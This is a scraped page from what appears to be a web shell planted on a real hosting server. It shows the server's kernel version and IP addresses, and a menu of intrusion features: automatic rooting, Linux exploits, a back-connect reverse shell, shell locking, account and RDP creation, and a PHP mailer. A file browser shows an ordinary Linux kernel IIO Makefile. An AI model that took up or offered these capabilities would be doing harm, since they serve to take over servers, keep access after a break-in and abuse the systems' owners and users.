Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.43
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
drivers /
iio /
[ HOME SHELL ]
Name
Size
Permission
Action
accel
[ DIR ]
drwxr-xr-x
adc
[ DIR ]
drwxr-xr-x
afe
[ DIR ]
drwxr-xr-x
amplifiers
[ DIR ]
drwxr-xr-x
buffer
[ DIR ]
drwxr-xr-x
cdc
[ DIR ]
drwxr-xr-x
chemical
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
dac
[ DIR ]
drwxr-xr-x
dummy
[ DIR ]
drwxr-xr-x
frequency
[ DIR ]
drwxr-xr-x
gyro
[ DIR ]
drwxr-xr-x
health
[ DIR ]
drwxr-xr-x
humidity
[ DIR ]
drwxr-xr-x
imu
[ DIR ]
drwxr-xr-x
light
[ DIR ]
drwxr-xr-x
magnetometer
[ DIR ]
drwxr-xr-x
multiplexer
[ DIR ]
drwxr-xr-x
orientation
[ DIR ]
drwxr-xr-x
position
[ DIR ]
drwxr-xr-x
potentiometer
[ DIR ]
drwxr-xr-x
potentiostat
[ DIR ]
drwxr-xr-x
pressure
[ DIR ]
drwxr-xr-x
proximity
[ DIR ]
drwxr-xr-x
resolver
[ DIR ]
drwxr-xr-x
temperature
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
trigger
[ DIR ]
drwxr-xr-x
Kconfig
2.93
KB
-rw-r--r--
Makefile
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for the industrial I/O core. # obj-$(CONFIG_IIO) += industrialio.o industrialio-y := industrialio-core.o industrialio-event.o inkern.o industrialio-$(CONFIG_IIO_BUFFER) += industrialio-buffer.o industrialio-$(CONFIG_IIO_TRIGGER) += industrialio-trigger.o obj-$(CONFIG_IIO_CONFIGFS) += industrialio-configfs.o obj-$(CONFIG_IIO_SW_DEVICE) += industrialio-sw-device.o obj-$(CONFIG_IIO_SW_TRIGGER) += industrialio-sw-trigger.o obj-$(CONFIG_IIO_TRIGGERED_EVENT) += industrialio-triggered-event.o obj-y += accel/ obj-y += adc/ obj-y += afe/ obj-y += amplifiers/ obj-y += buffer/ obj-y += cdc/ obj-y += chemical/ obj-y += common/ obj-y += dac/ obj-y += dummy/ obj-y += gyro/ obj-y += frequency/ obj-y += health/ obj-y += humidity/ obj-y += imu/ obj-y += light/ obj-y += magnetometer/ obj-y += multiplexer/ obj-y += orientation/ obj-y += position/ obj-y += potentiometer/ obj-y += potentiostat/ obj-y += pressure/ obj-y += proximity/ obj-y += resolver/ obj-y += temperature/ obj-y += test/ obj-y += trigger/
Close